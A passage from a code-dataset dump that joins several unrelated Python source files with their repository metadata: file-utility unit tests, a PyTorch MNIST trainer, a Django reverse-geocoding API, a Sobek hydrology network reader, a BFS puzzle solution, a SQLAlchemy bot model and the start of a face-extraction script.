temp_file_path = temp_file.name
self.assertEqual(ValkyrieTools.getFileData(temp_file_path), file_content)
def test_getFileSize(self):
file_content = b'This is the file content.'
with tempfile.NamedTemporaryFile(delete=False) as temp_file:
temp_file.write(file_content)
temp_file_path = temp_file.name
expected_file_size = len(file_content)
self.assertEqual(ValkyrieTools.getFileSize(temp_file_path), expected_file_size)
def test_getFileEdit(self):
with tempfile.NamedTemporaryFile(delete=False) as temp_file:
temp_file_path = temp_file.name
time.sleep(1)
expected_edit_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(os.path.getmtime(temp_file_path)))
self.assertEqual(ValkyrieTools.getFileEdit(temp_file_path), expected_edit_time)
def test_getFileList(self):
temp_dir = tempfile.mkdtemp()
os.makedirs(os.path.join(temp_dir, 'subdir'))
with tempfile.NamedTemporaryFile(dir=temp_dir) as temp_file1:
with tempfile.NamedTemporaryFile(dir=os.path.join(temp_dir, 'subdir')) as temp_file2:
expected_file_list = [temp_file1.name.replace("\\", "/"), temp_file2.name.replace("\\", "/")]
self.assertEqual(ValkyrieTools.getFileList(temp_dir), expected_file_list)
if __name__ == '__main__':
unittest.main()
| ValkyFischer/ValkyrieUtils | unittests/test_tools.py | test_tools.py | py | 7,154 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "Tools.ValkyrieTools.isFloat",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "Tools.ValkyrieTools",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "T... |
31044290128 | import torch
from torch.autograd import Function
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import time
import numpy as np
#Force Determinism
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(0)
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
input_size = 784
hidden_size = 500
num_classes = 10
num_epochs = 1
batch_size = 50000
learning_rate = 0.00005
# MNIST dataset
train_dataset = torchvision.datasets.MNIST(root='../../data',
train=True,
transform=transforms.ToTensor(),
download=True)
test_dataset = torchvision.datasets.MNIST(root='../../data',
train=False,
transform=transforms.ToTensor())
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=False)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
rand_mask = torch.zeros(784)
rand_mask2 = torch.zeros(500)
class Linear(nn.Module):
def __init__(self, input_features, output_features, bias=True):
super(Linear, self).__init__()
self.input_features = input_features
self.output_features = output_features
# nn.Parameter is a special kind of Tensor, that will get
# automatically registered as Module's parameter once it's assigned
# as an attribute. Parameters and buffers need to be registered, or
# they won't appear in .parameters() (doesn't apply to buffers), and
# won't be converted when e.g. .cuda() is called. You can use
# .register_buffer() to register buffers.
# nn.Parameters require gradients by default.
self.weight = nn.Parameter(torch.Tensor(output_features, input_features))
if bias:
self.bias = nn.Parameter(torch.Tensor(output_features))
else:
# You should always register all possible parameters, but the
# optional ones can be None if you want.
self.register_parameter('bias', None)
# Not a very smart way to initialize weights
self.weight.data.uniform_(-0.1, 0.1)
if bias is not None:
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
# See the autograd section for explanation of what happens here.
return MyFunction.apply(input, self.weight, self.bias)
def extra_repr(self):
# (Optional)Set the extra information about this module. You can test
# it by printing an object of this class.
return 'in_features={}, out_features={}, bias={}'.format(
self.in_features, self.out_features, self.bias is not None
)
# Inherit from Function
class MyFunction(Function):
# Note that both forward and backward are @staticmethods
@staticmethod
# bias is an optional argument
def forward(ctx, input, weight, bias=None):
rand_mask = torch.zeros(input.shape)
#weight_rand_mask = torch.ones(weight.shape)
ctx.save_for_backward(input, weight, bias)
input = input + rand_mask
#weight = weight + weight_rand_mask
output = input.mm(weight.t())
rand_mask = rand_mask.mm(weight.t())
output = output - rand_mask #- weight_rand_mask
if bias is not None:
#bias_rand_mask = torch.ones(output.shape)
#bias = bias + bias_rand_mask
output += bias.unsqueeze(0).expand_as(output)
#output = output - bias_rand_mask
#print("Forward Output: ")
#print(output)
#time.sleep(5)
return output
# This function has only a single output, so it gets only one gradient
@staticmethod
def backward(ctx, grad_output):
# This is a pattern that is very convenient - at the top of backward
# unpack saved_tensors and initialize all gradients w.r.t. inputs to
# None. Thanks to the fact that additional trailing Nones are
# ignored, the return statement is simple even when the function has
# optional inputs.
input, weight, bias = ctx.saved_tensors
grad_input = grad_weight = grad_bias = None
# These needs_input_grad checks are optional and there only to
# improve efficiency. If you want to make your code simpler, you can
# skip them. Returning gradients for inputs that don't require it is
# not an error.
if ctx.needs_input_grad[0]:
grad_input = grad_output.mm(weight)
if ctx.needs_input_grad[1]:
grad_weight = grad_output.t().mm(input)
if bias is not None and ctx.needs_input_grad[2]:
grad_bias = grad_output.sum(0)
#print("Grad_input: ")
#print(grad_input)
#time.sleep(5)
return grad_input, grad_weight, grad_bias
# Fully connected neural network with one hidden layer
class NeuralNet(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(NeuralNet, self).__init__()
self.fc1 = Linear(input_size, hidden_size)
self.tanh = nn.Tanh()
self.fc2 = Linear(hidden_size, hidden_size)
self.tanh = nn.Tanh()
self.fc3 = Linear(hidden_size, hidden_size)
self.tanh = nn.Tanh()
self.fc4 = Linear(hidden_size, hidden_size)
self.tanh = nn.Tanh()
self.fc5 = Linear(hidden_size, num_classes)
def forward(self, x):
out = self.fc1(x)
out = self.tanh(out)
out = self.fc2(out)
out = self.tanh(out)
out = self.fc3(out)
out = self.tanh(out)
out = self.fc4(out)
out = self.tanh(out)
out = self.fc5(out)
return out
model = NeuralNet(input_size, hidden_size, num_classes).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, dampening=0, weight_decay=0, nesterov=False)
# Train the model
total_step = len(train_loader)
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
# Move tensors to the configured device
images = images.reshape(-1, 28*28).to(device)
labels = labels.to(device)
#rand_mask = torch.ones(784)
#rand_mask2 = torch.ones(500)
#for k in images:
# k = torch.add(k, rand_mask)
outputs = model(images)
loss = criterion(outputs, labels)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# Test the model
# In test phase, we don't need to compute gradients (for memory efficiency)
with torch.no_grad():
correct = 0
total = 0
for images, labels in test_loader:
images = images.reshape(-1, 28*28).to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: {} %'.format(100 * correct / total))
# Save the model checkpoint
torch.save(model.state_dict(), 'model.ckpt')
| RyanKarl/SGX_NN_Training_and_Inference | examples/mnist/test_main.py | test_main.py | py | 7,871 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.manual_seed",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.backends",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.backends",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "numpy.rando... |
25730149556 | # -*- coding: utf-8 -*-
from django.shortcuts import render
import psycopg2
import psycopg2.extras
import json
from django.http import HttpResponse
from django.http import HttpResponseServerError
from django.http import HttpResponseBadRequest
from .dicttoxml import DictToXML
def index(request):
# Try to connect
try:
conn = psycopg2.connect(
database="gis"
)
cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cursor.execute("SELECT date FROM bev_date;")
sql_result = cursor.fetchall()
date = sql_result[0]['date'].strftime('%d.%m.%Y')
except Exception as e:
result = {
"status": "server_error",
"message": "The web application was unable to connect to the database. Please inform the site " +
"administrator about this issue."
}
return HttpResponseServerError(json.dumps(result), content_type="application/json")
return render(request, context={'date': date}, template_name='index.html')
def is_float(value):
try:
float(value)
return True
except ValueError:
return False
def reverse_geocode(request, format):
default_distance = 30
max_distance = 100
default_limit = 5
max_limit = 10
# Get the HTTP GET parameters and use default values where it makes sense.
lat = request.GET.get("lat")
lon = request.GET.get("lon")
epsg = request.GET.get("epsg", "4326")
distance = request.GET.get("distance", default_distance)
limit = request.GET.get('limit', default_limit)
# Try to connect
try:
conn = psycopg2.connect(
database="gis"
)
except Exception as e:
result = {
"status": "server_error",
"message": "The web application was unable to connect to the database. Please inform the site " +
"administrator about this issue."
}
return HttpResponseServerError(json.dumps(result), content_type="application/json")
cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
# Do basic data validation.
if not format in ["json", "xml"]:
result = {
"status": "bad_request",
"message": "The format must either by JSON or XML."
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
if not epsg.isdigit():
result = {
"status": "bad_request",
"message": "The EPSG parameter must be an integer vaule."
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
epsg = int(epsg)
epsg_statement = "SELECT srid from spatial_ref_sys WHERE srid=%s"
cursor.execute(epsg_statement, (epsg,))
epsg_result = cursor.fetchall()
if len(epsg_result) < 1:
result = {
"status": "bad_request",
"message": "EPSG %s is not supported or does not exist. Try 4326!" % epsg
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
if not distance.isdigit() or (int(distance) > max_distance) or (int(distance) < 0):
result = {
"status": "bad_request",
"message": "The distance value must be an integer between 0 and %s." % max_distance
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
if not limit.isdigit() or (int(limit) > max_limit) or (int(limit) < 1):
result = {
"status": "bad_request",
"message": "The limit parameter must be an integer between 1 and %s." % max_limit
}
return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
# Get the data release date and format it.
try:
cursor.execute("SELECT date FROM bev_date;")
sql_result = cursor.fetchall()
date = sql_result[0]['date']
except Exception as e:
result = {
"status": "server_error",
"message": "Could not get the release date of the BEV data."
}
return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
statement = """
select b.municipality, b.locality, b.postcode, b.street, b.house_number, b.house_name, b.address_type,
ST_Distance(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point) as distance,
ST_X(ST_Transform(point::geometry, %s)) as lon, ST_Y(ST_Transform(point::geometry, %s)) as lat,
municipality_has_ambiguous_addresses
from bev_addresses b
where ST_DWithin(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point, %s)
order by distance
limit %s
"""
try:
cursor.execute(statement, (lon, lat, epsg, epsg, epsg, lon, lat, epsg, distance, limit,))
sql_result = cursor.fetchall()
# Convert the result from psycopg2.extras.RealDictRow back to a usual dict.
dict_result = []
for row in sql_result:
dict_result.append(dict(row))
except Exception as e:
result = {
"status": "server_error",
"message": "There was a problem querying the database. Please verify that the parameters you submitted " +
"(especially the coordinates according to the EPSG you specified) make sense."
}
return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
result = {"status": "ok",
"copyright": u"© Österreichisches Adressregister 2017, N 23806/2017 (Stichtagsdaten vom %s)" % (
date.strftime('%d.%m.%Y')), "address_date": date.strftime('%Y-%m-%d'), "results": dict_result}
return HttpResponse(get_response_content(result, format), content_type=get_content_type(format))
def get_response_content(dictionary, format):
if format == 'json':
return json.dumps(dictionary)
elif format == 'xml':
xml = DictToXML({"reverse_geocode_results": dictionary}, list_mappings={"results": "address"})
return xml.get_string()
return ""
def get_content_type(format):
if format == 'json':
return "application/json"
elif format == 'xml':
return "application/xml"
return "text/plain"
| thomaskonrad/bev-reverse-geocoder | bev_reverse_geocoder_api/views.py | views.py | py | 6,488 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "psycopg2.connect",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "psycopg2.extras",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "django.http.HttpResponseServerError",
"line_number": 32,
"usage_type": "call"
},
{
"api_nam... |
73200838504 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 14:15:46 2019
@author: danie
"""
import geopandas as gpd
import pandas as pd
from shapely.geometry import LineString, Point
import os
import re
import numpy as np
import hkvsobekpy as his
import csv
#%%
def __between(value, a, b):
# Find and validate before-part.
pos_a = value.find(a)
if pos_a == -1:
return ""
# Find and validate after part.
pos_b = value.rfind(b)
if pos_b == -1:
return ""
# Return middle part.
adjusted_pos_a = pos_a + len(a)
if adjusted_pos_a >= pos_b:
return ""
return value[adjusted_pos_a:pos_b]
def __split_line(lineString, point, buffer=False):
if not buffer:
pointIntersect = point
else:
pointIntersect = point.buffer(buffer)
coords = lineString.coords
j = None
for i in range(len(coords) - 1):
if LineString(coords[i : i + 2]).intersects(pointIntersect):
j = i
break
assert j is not None
# Make sure to always include the point in the first group
return (
coords[: j + 1] + [Point(point).coords[0]],
[Point(point).coords[0]] + coords[j + 1 :],
)
__friction_models = {
"0": "chezy",
"1": "manning",
"2": "strickler (kn)",
"3": "strickler (ks)",
"4": "white-colebrook",
"7": "bos and bijkerk",
}
__flow_boundary_types = {"0": "waterlevel", "1": "discharge"}
__structure_types = {"6": "weir", "7": "orifice", "9": "pump"}
__structure_flow_dirs = {"0": "both", "1": "positive", "2": "negative", "3": "no_flow"}
__pump_control = {"1": "suction", "2": "delivery", "3": "both_sides"}
__control_types = {"0": "time", "1": "hydraulic", "2": "interval", "3": "PID"}
__control_param = {
"0": "crest_level",
"1": "crest_width",
"2": "gate_height",
"3": "pump_capacity",
}
__profile_types = {}
__match_num = "[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?"
# %% read network
def network(path, crs):
"""Read al network-files."""
links = gpd.GeoDataFrame(
columns=["ID", "FROM_NODE", "TO_NODE", "geometry"], geometry="geometry"
)
nodes = gpd.GeoDataFrame(columns=["ID", "geometry"], geometry="geometry")
with open(os.path.join(path, "network.tp"), "r") as networkTP:
for line in networkTP.readlines():
if line[0:4] == "NODE":
ident = __between(line, "id '", "' nm")
x = float(__between(line, "px ", " py"))
y = float(__between(line, "py ", " node"))
nodes = nodes.append(
{"ID": ident, "geometry": Point(x, y)}, ignore_index=True
)
elif line[0:4] == "BRCH":
ident = __between(line, "id '", "' nm")
from_node = __between(line, "bn '", "' en")
to_node = __between(line, "en '", "' al")
links = links.append(
{"ID": ident, "FROM_NODE": from_node, "TO_NODE": to_node},
ignore_index=True,
)
# open network.cp to define channel geometry
with open(os.path.join(path, "network.cp"), "r") as networkCP:
for reach in networkCP.read().split("BRCH")[1:]:
ident = __between(reach, "id '", "' cp")
cps = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
from_node = list(links.loc[links["ID"] == ident, "FROM_NODE"])[0]
to_node = list(links.loc[links["ID"] == ident, "TO_NODE"])[0]
coord_list = list(
list(nodes.loc[nodes["ID"] == from_node].geometry)[0].coords
)
sumDistance = 0.0
for idx, cp in enumerate(cps):
distance, angle = cp.split()
distance = (float(distance) - sumDistance) * 2
angle = np.deg2rad(90 - float(angle))
x = coord_list[-1][0] + float(distance) * np.cos(angle)
y = coord_list[-1][1] + float(distance) * np.sin(angle)
coord_list += [(x, y)]
sumDistance += distance
coord_list[-1] = list(
list(nodes.loc[nodes["ID"] == to_node].geometry)[0].coords
)[0]
index = links.loc[links["ID"] == ident].index[0]
links.at[index, "geometry"] = LineString(coord_list)
network = {}
objects = gpd.GeoDataFrame(
columns=["ID", "TYPE", "LINK", "LINK_POS", "geometry"],
geometry="geometry",
crs=crs,
)
objects_list = []
with open(os.path.join(path, "network.ntw"), "r") as networkNTW:
doLinks = True
for idx, l in enumerate(
csv.reader(
networkNTW.readlines(),
quotechar='"',
delimiter=",",
quoting=csv.QUOTE_ALL,
)
):
if idx > 0:
if doLinks:
if l[0] == "*":
doLinks = False
if doLinks:
network.update(
{
l[0]: {
"properties": {
"type": l[4],
"customType": l[5],
"startNode": l[14],
"endNode": l[27],
},
"lineString": [
[float(l[21]), float(l[22])],
[float(l[34]), float(l[35])],
],
}
}
)
if not l[14] in objects_list:
objects_list.append(l[14])
objects = objects.append(
{
"ID": l[14],
"NAME": l[15],
"TYPE": l[19],
"geometry": Point([float(l[21]), float(l[22])]),
},
ignore_index=True,
)
if not l[27] in objects_list:
objects_list.append(l[27])
objects = objects.append(
{
"ID": l[27],
"NAME": l[28],
"TYPE": l[32],
"geometry": Point([float(l[34]), float(l[35])]),
},
ignore_index=True,
)
h_points = gpd.GeoDataFrame(
columns=["ID", "geometry"], geometry="geometry", crs=crs
)
v_links = gpd.GeoDataFrame(
columns=["ID", "TYPE", "CUSTOM_TYPE", "FROM_NODE", "TO_NODE", "geometry"],
geometry="geometry",
crs=crs,
)
with open(os.path.join(path, "network.gr"), "r") as networkGR:
hLocations = his.read_his.ReadMetadata(
os.path.join(path, "calcpnt.his"), hia_file="auto"
).GetLocations()
for reach in networkGR.read().split("GRID")[1:]:
ident = __between(reach, "id '", "' ci")
line = list(links.loc[links["ID"] == ident, "geometry"])[0]
gridTable = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
for idx, grid in enumerate(gridTable):
grid = grid.split()
h_point = grid[3].replace("'", "")
if h_point in hLocations: # check if point is ignored by Sobek-core
point = (float(grid[5]), float(grid[6]))
if h_point not in list(h_points["ID"]):
h_points = h_points.append(
{"ID": h_point, "geometry": Point(point)}, ignore_index=True
)
if idx == 0:
v_point = grid[4].replace("'", "")
Type = network[v_point]["properties"]["type"]
customType = network[v_point]["properties"]["customType"]
pointFrom = h_point
else:
pointTo = h_point
segment, line = __split_line(
LineString(line), Point(point), buffer=0.01
)
v_links = v_links.append(
{
"ID": v_point,
"TYPE": Type,
"CUSTOM_TYPE": customType,
"FROM_NODE": pointFrom,
"TO_NODE": pointTo,
"geometry": LineString(segment),
},
ignore_index=True,
)
v_point = grid[4].replace("'", "")
pointFrom = h_point
# use ID as index
for df in [links, nodes, objects, v_links]:
df.index = df["ID"]
with open(os.path.join(path, "network.cr"), "r") as networkCR:
for line in networkCR:
if re.match("CRSN", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) crsn", line).group(1)
)
with open(os.path.join(path, "network.st"), "r") as networkST:
for line in networkST:
if re.match("STRU", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) stru", line).group(1)
)
with open(os.path.join(path, "network.cn"), "r") as networkCN:
for line in networkCN:
if re.match("FLBX", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) flbx", line).group(1)
)
return {
"links": links.set_crs(crs, inplace=True),
"nodes": nodes.set_crs(crs, inplace=True),
"objects": objects.set_crs(crs, inplace=True),
"segments": v_links.set_crs(crs, inplace=True),
}
def results(path):
"""Read meta-data from his-files."""
files = {
"links": "reachseg.his",
"points": "calcpnt.his",
"structures": "struc.his",
}
result = {"links": None, "points": None, "structures": None}
for key, item in files.items():
if os.path.exists(os.path.join(path, item)):
meta_data = his.read_his.ReadMetadata(
os.path.join(path, item), hia_file="auto"
)
parameters = meta_data.GetParameters()
locations = meta_data.GetLocations()
result.update(
{
key: {
"df": meta_data.DataFrame(),
"parameters": parameters,
"locations": locations,
}
}
)
return result
def parameters(path):
"""Read parameters from a sobek case."""
result = dict()
with path.joinpath("friction.dat").open() as friction_dat:
result["friction"] = dict()
for line in friction_dat:
if re.match(".*BDFR.*", line):
model = __friction_models[__between(line, 'mf', ' mt').replace(' ', '')]
value = float(__between(line, 'mt cp 0', '0 mr').replace(' ', ''))
result['friction']['global'] = {'model': model,
'value': value}
with path.joinpath('struct.dat').open() as struct_dat:
structures = dict()
for line in struct_dat:
if re.match("STRU", line):
struc_id = re.search(".id '(.*)' nm.", line).group(1)
structures[struc_id] = {}
structures[struc_id]["def_id"] = re.search(
".dd '(.*)' ca.", line
).group(1)
structures[struc_id]["control_id"] = re.search(
"cj '(.*)' ", line
).group(1)
structures[struc_id]["control_active"] = bool(
int(re.search(f"ca ({__match_num}) ", line).group(1))
)
result["structures"] = structures
with path.joinpath("struct.def").open() as struct_def:
for stds in struct_def.read().split("stds"):
if "STDS" in stds:
def_id = re.search(".id '(.*)' nm.", stds).group(1)
struc_def = dict()
struc_def["type"] = __structure_types[
re.search(".ty ([0-9]).", stds).group(1)
]
if struc_def["type"] in ["weir", "orifice"]:
struc_def["crest_level"] = float(
re.search(f".cl ({__match_num}).", stds).group(1)
)
struc_def["crest_width"] = float(
re.search(f".cw ({__match_num}).", stds).group(1)
)
struc_def["flow_dir"] = __structure_flow_dirs[
re.search(f".rt ({__match_num}).", stds).group(1)
]
if struc_def["type"] == "weir":
cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
ce = float(re.search(f".ce ({__match_num}).", stds).group(1))
struc_def["coefficient"] = ce * cw
if struc_def["type"] == "orifice":
cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
mu = float(re.search(f".mu ({__match_num}).", stds).group(1))
struc_def["coefficient"] = mu * cw
elif struc_def["type"] == "pump":
struc_def["control_side"] = __pump_control[
re.search(f".dn ({__match_num}).", stds).group(1)
]
stages = (
re.search(".*\nTBLE\n(.*)<\ntble.", stds).group(1).split("<")
)
stages = [stage.split() for stage in stages]
struc_def["pump_stages"] = [
{
"capacity": float(stage[0]),
"suction_on": float(stage[1]),
"suction_off": float(stage[2]),
"delivery_on": float(stage[3]),
"delivery_off": float(stage[4]),
}
for stage in stages
]
struc_id = next(
(
st_id
for st_id, values in structures.items()
if values["def_id"] == def_id
),
None,
)
if struc_id:
result["structures"][struc_id] = {
**result["structures"][struc_id],
**struc_def,
}
else:
print(f"structure definition {def_id} not linked to structure-id")
with path.joinpath("profile.dat").open() as profile_dat:
cross_sections = dict()
for line in profile_dat:
if re.match("CRSN", line):
xs_id = re.search(".id '(.*)' di.", line).group(1)
cross_sections[xs_id] = re.search(".di '(.*)' rl.", line).group(1)
result["cross_sections"] = cross_sections.copy()
with path.joinpath("profile.def").open() as profile_dat:
for crds in profile_dat.read().split("crds"):
if "CRDS" in crds:
def_id = re.search(".id '(.*)' nm.", crds).group(1)
xs_type = re.search(f".ty ({__match_num}).", crds).group(1)
crds = crds.replace("\n", "")
coords = re.search(r".*TBLE(.*)<tble.", crds).group(1).split("<")
if xs_type == "0":
z = np.array([float(coord.split()[0]) for coord in coords])
w = np.array([float(coord.split()[1]) for coord in coords])
series = pd.Series(
data=np.concatenate([np.flip(z), z]),
index=np.concatenate([np.flip(-w / 2), w / 2]),
)
else:
print(f"ERROR: structure type {xs_type} not supported!")
prof_ids = [
xs_id
for xs_id, xs_def in cross_sections.items()
if xs_def == def_id
]
if prof_ids:
for prof_id in prof_ids:
result["cross_sections"][prof_id] = series.copy()
else:
print(f"profile definition {def_id} not linked to profile-id")
return result
def control(path):
"""Read controls from a sobek case."""
result = dict()
with path.joinpath("control.def").open() as control_def:
for cntl in control_def.read().split("cntl"):
if "CNTL" in cntl:
cntl_def = {}
def_id = re.search(".id '(.*)' nm.", cntl).group(1)
cntl_def["type"] = __control_types[
re.search(f".ct ({__match_num}).", cntl).group(1)
]
cntl_def["parameter"] = __control_param[
re.search(f".ca ({__match_num}).", cntl).group(1)
]
if cntl_def["type"] == "PID":
cntl_def["min_value"] = float(
re.search(f".ui ({__match_num}) ", cntl).group(1)
)
cntl_def["max_value"] = float(
re.search(f".ua ({__match_num}) ", cntl).group(1)
)
elif cntl_def["type"] == "time":
crest_levels = []
for cntl_line in cntl.splitlines():
if "<" in cntl_line:
crest_levels.append(float(cntl_line.split(" ")[1]))
if len(crest_levels) > 0:
cntl_def["min_value"] = np.min(crest_levels)
cntl_def["max_value"] = np.max(crest_levels)
tble_str = cntl.replace("\n", "")
if "TBLE" in tble_str:
cntl_def["table"] = {}
tbl_props = re.findall("PDIN (.*) pdin", tble_str)
if len(tbl_props) > 0:
tbl_props = tbl_props[0].split()
cntl_def["table"]["function"] = tbl_props[0]
cntl_def["table"]["use_periodicity"] = bool(int(tbl_props[1]))
if cntl_def["table"]["use_periodicity"] == "1":
cntl_def["table"]["periodicity"] = tbl_props[2]
tble_list = (
re.search(r".*TBLE(.*)<tble.", tble_str).group(1).split("<")
)
date_time = [
pd.to_datetime(row.split()[0], format="'%Y/%m/%d;%H:%M:%S'")
for row in tble_list
]
values = [float(row.split()[1]) for row in tble_list]
cntl_def["table"]["data"] = pd.Series(data=values, index=date_time)
result[def_id] = cntl_def
return result
def boundaries(path):
"""Read boundaries from a sobek case."""
result = dict()
with path.joinpath("boundary.dat").open() as boundary_dat:
result["flow"] = dict()
for line in boundary_dat:
if re.match("FLBO", line):
ident = __between(line, "id", "st").replace(" ", "").replace("'", "")
result["flow"][ident] = {
"TYPE": __flow_boundary_types[
re.search(".ty ([0-9]).", line).group(1)
]
}
result["flow"] = pd.DataFrame.from_dict(result["flow"], orient="index")
return result
| d2hydro/sobek_kisters | sobek/read.py | read.py | py | 20,927 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "shapely.geometry.LineString",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "shapely.geometry.Point",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "shapely.geometry.Point",
"line_number": 49,
"usage_type": "call"
},
{
"api_nam... |
24201086153 | # 백준 - 유기농 배추
import sys, collections
T = int(sys.stdin.readline())
tc = 0
def bfs(start, M, N):
global visited
dirs = ((-1,0), (1,0), (0,-1), (0,1)) # 상, 하, 좌, 우
queue = collections.deque()
queue.append(start)
while queue:
i, j = queue.popleft()
if visited[i][j]:
continue
visited[i][j] = True
for dir in dirs:
n_i, n_j = i+dir[0], j+dir[1]
if 0<= n_i < M and 0<=n_j <N:
if arr[n_i][n_j] and not visited[n_i][n_j]:
queue.append([n_i, n_j])
while tc < T:
M, N, K = map(int ,sys.stdin.readline().split(" "))
arr = [[False for _ in range(N)] for _ in range(M)]
visited = [[False for _ in range(N)] for _ in range(M)]
answer = 0
for _ in range(K):
i, j = map(int ,sys.stdin.readline().split(" "))
arr[i][j] = True
for i in range(M):
for j in range(N):
if arr[i][j] and not visited[i][j]:
answer += 1
bfs([i,j], M, N)
print(answer)
tc += 1 | superyodi/burning-algorithm | bfs/boj_1012.py | boj_1012.py | py | 1,095 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.stdin.readline",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.stdin.readline"... |
20678800215 | from __future__ import annotations
from typing import List, Optional
from sqlalchemy import BigInteger, Column, Integer, String
from pie.database import database, session
class Seeking(database.base):
__tablename__ = "fun_seeking_seeking"
idx = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BigInteger)
channel_id = Column(BigInteger, default=None)
message_id = Column(BigInteger, unique=True)
user_id = Column(BigInteger)
text = Column(String)
@staticmethod
def add(
guild_id: int, channel_id: int, message_id: int, user_id: int, text: str
) -> Seeking:
query = Seeking(
guild_id=guild_id,
channel_id=channel_id,
message_id=message_id,
user_id=user_id,
text=text,
)
session.add(query)
session.commit()
return query
@staticmethod
def get(guild_id: int, channel_id: int, item_id: int) -> Optional[Seeking]:
return (
session.query(Seeking)
.filter_by(guild_id=guild_id, channel_id=channel_id, idx=item_id)
.one_or_none()
)
@staticmethod
def remove(guild_id: int, channel_id: int, item_id: int) -> int:
query = (
session.query(Seeking)
.filter_by(guild_id=guild_id, channel_id=channel_id, idx=item_id)
.delete()
)
session.commit()
return query
@staticmethod
def get_all(guild_id: int, channel_id: int = None) -> List[Seeking]:
if not channel_id:
return session.query(Seeking).filter_by(guild_id=guild_id).all()
return (
session.query(Seeking)
.filter_by(guild_id=guild_id, channel_id=channel_id)
.all()
)
def __repr__(self) -> str:
return (
f"<Seeking idx='{self.idx}' guild_id='{self.guild_id}' "
f"channel_id='{self.channel_id}' message_id='{self.message_id}' "
f"user_id='{self.user_id}' text='{self.text}'>"
)
def dump(self) -> dict:
return {
"guild_id": self.guild_id,
"channel_id": self.channel_id,
"message_id": self.message_id,
"user_id": self.user_id,
"text": self.text,
}
| pumpkin-py/pumpkin-fun | seeking/database.py | database.py | py | 2,317 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pie.database.database.base",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "pie.database.database",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 13,
"usage_type": "call"
},
{
"api_name"... |
44258229341 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
import tensorflow.keras.backend as K
# from keras.models import load_model
from tensorflow.keras.models import load_model
from os import listdir
from os.path import isdir
from PIL import Image
import numpy as np
from numpy import load
from numpy import expand_dims
from numpy import asarray
from sklearn.metrics import accuracy_score, pairwise_distances
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import Normalizer
from sklearn.svm import SVC
from tqdm import tqdm
def extract_face(filename, required_size=(160, 160)):
"""
Extract a single face from a given photograph
Inputs:
- filename: path of a file to be converted
Returns:
- face_array: array of face image pixel with RGB channel
"""
image = Image.open(filename)
image = image.convert('RGB')
pixels = asarray(image)
face_array = pixels
return face_array
def load_faces(directory):
"""
